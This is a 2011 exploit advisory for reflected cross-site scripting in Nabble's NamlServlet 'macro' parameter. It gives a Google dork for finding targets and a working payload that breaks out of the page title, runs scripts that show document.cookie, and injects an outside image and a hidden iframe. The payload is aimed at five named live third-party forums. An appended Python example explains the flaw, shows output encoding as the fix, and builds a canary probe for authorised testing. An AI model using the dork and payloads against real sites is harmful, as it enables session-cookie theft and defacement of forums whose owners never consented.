# Date: 13.10.2011
# Author: Sony
# Software Link: http://www.nabble.com/
# Google Dorks: inurl:NamlServlet.jtp or inurl:/template/NamlServlet.jtp?macro=
# Browser: Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC: http://st2tea.blogspot.com/2011/10/nabble-forums-cross-site-scripting.html

..................................................................

Well.. We can see an error on the page when the macro name is not found:

http://dwr.2114559.n2.nabble.com/template/NamlServlet.jtp?macro=search_page%20&node=5394489&query=xmlbeans

Our XSS is here, in the macro parameter, which is reflected into the error page without HTML encoding:

template/NamlServlet.jtp?macro=search_page[XSS]%20&node=5394489&query=xmlbeans

After:

http://dwr.2114559.n2.nabble.com/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans

Percent-decoded, the macro value the servlet echoes back is:

search_page "></title><script>alert("XSS")</script><script>alert("TEST")</script><script>alert("by Sony")</script><script>alert(document.cookie)</script>"><img src="http://top10best.ucoz.ru/Cats1/cat1_1.jpg" style="height: 800px; width: 950px;"<iframe src =http://www.youtube.com/watch?v=TCUaQzw707M" width="0" height="0" \></div>

The leading "></title> closes the <title> element the value lands in, so the script tags that follow are parsed as markup instead of text; alert(document.cookie) shows the session cookie is reachable.

Some demo with Google Dorks (same payload, other Nabble-hosted forums):

http://forum.nyskiblog.com/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans

http://discuss.supergenpass.com/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans

http://www.pcl-users.org/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans

http://nabble.documentfoundation.org/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans
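The following is an added example (not code from the advisory or from Nabble): it decodes the macro value from the PoC query string the way the servlet would, renders it into a constructed stand-in for the error page both unencoded (the bug class above) and with HTML entity encoding at the output point, and gives a reflection check plus a properly encoded probe builder for a host you are authorised to test. The error-page markup, the canary string and the example.invalid host are assumptions; the advisory only shows that the value is echoed and that the payload has to close </title> first.

```python
"""Added example, not part of the original advisory.

Decodes the NamlServlet `macro` payload, shows why unencoded reflection
lets it break out of the page, and provides a reflection check for a
saved response body. ERROR_TEMPLATE is a constructed stand-in; the
advisory does not reproduce Nabble's real markup.
"""
import html
import re
import urllib.parse

# Query string from the advisory's PoC URL, trimmed to the parts that
# carry the reflection (the img/iframe tail changes nothing here).
POC_QUERY = (
    "macro=search_page%20%22%3E%3C/title%3E"
    "%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E"
    "%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
    "&node=5394489&query=xmlbeans"
)

# Hypothetical error page: the only thing the advisory supports is that
# the macro name is echoed inside <title>, since the payload closes it.
ERROR_TEMPLATE = (
    "<html><head><title>Error: unknown macro '{macro}'</title></head>"
    "<body><p>The requested page could not be rendered.</p></body></html>"
)


def macro_value(query: str) -> str:
    """Percent-decode the `macro` parameter the way the servlet sees it."""
    params = dict(urllib.parse.parse_qsl(query, keep_blank_values=True))
    return params["macro"]


def render_vulnerable(query: str) -> str:
    """Reflect the raw parameter into the page: the bug on this page."""
    return ERROR_TEMPLATE.format(macro=macro_value(query))


def render_fixed(query: str) -> str:
    """Same page with entity encoding applied at the output point.

    quote=True also encodes '"' so the value cannot close an attribute
    if the template ever moves it into one.
    """
    return ERROR_TEMPLATE.format(macro=html.escape(macro_value(query), quote=True))


# Opening script tags only; </script> does not match because of the '/'.
_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def script_tag_count(body: str) -> int:
    """Number of live <script> elements a browser would execute."""
    return len(_SCRIPT_TAG.findall(body))


def reflects_unescaped(body: str, canary: str) -> bool:
    """True if `canary` appears verbatim in `body`, i.e. the input came
    back without encoding. Use a unique tag as canary, not alert()."""
    return canary in body


def build_probe(base_url: str, canary: str, node: str = "5394489",
                query: str = "xmlbeans") -> str:
    """Build a correctly encoded probe URL; `base_url` is assumed to end in
    /template/NamlServlet.jtp as in the advisory's dork. Only send it to
    hosts you have permission to test."""
    params = urllib.parse.urlencode({"macro": canary, "node": node, "query": query})
    return f"{base_url}?{params}"


if __name__ == "__main__":
    print(macro_value(POC_QUERY))
    print("vulnerable reflects:", reflects_unescaped(render_vulnerable(POC_QUERY), "</title><script>"))
    print("fixed reflects:     ", reflects_unescaped(render_fixed(POC_QUERY), "</title><script>"))
    print(build_probe("http://example.invalid/template/NamlServlet.jtp", 'search_page"><xsscanary>'))
```

The check deliberately looks for the raw canary rather than for alert(): a response that contains &lt;script&gt; is encoded correctly and not exploitable, which is exactly what render_fixed produces while still showing the attacker's text in the page.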